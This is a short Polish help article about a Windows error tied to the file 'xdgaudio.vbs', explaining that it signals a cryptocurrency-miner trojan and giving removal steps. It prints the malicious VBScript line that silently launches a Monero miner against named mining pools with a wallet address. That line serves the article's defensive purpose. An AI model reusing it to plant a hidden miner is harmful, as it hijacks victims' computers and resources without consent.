Jeśli w systemie pojawia się następujący komunikat o błędzie związany z plikiem „xdgaudio.vbs”, najprawdopodobniej komputer jest zainfekowany.
Skrypt: C: \ windows \ xdgaudio.vbsLinia: 3
Char: 1
Błąd: system nie może znaleźć określonego pliku.
Kod: 80070002
Źródło: (null)
Skrypt edytowany za pomocą Notatnika może zawierać wiersze, takie jak poniżej:
Dim WShell Set WShell = CreateObject("WScript.Shell") WShell.Run "wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv.App -px -k -o stratum+tcp://mine.moneropool.com:3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv -px", 0 Set WShell = Nothing
Z pewnością wygląda to na trojana Miner CPU / kryptowaluty, który nie tylko spowalnia komputer, ale może również stanowić zagrożenie dla bezpieczeństwa. Pliki skryptów c: \ windows \ xdgaudio.vbs i c: \ windows \ servicecrsssr.vbs powinny zostać usunięte. To nie wystarczy. Przeprowadź dokładne skanowanie przy użyciu antymalware Malwarebytes, a także skanuj za pomocą używanego oprogramowania antywirusowego.
Aby uzyskać szczegółowe instrukcje dotyczące usuwania takiego trojana Miner, sprawdź przewodnik malwaretips.com Jak usunąć trojana CPU Miner z systemu Windows (Przewodnik po wirusach) .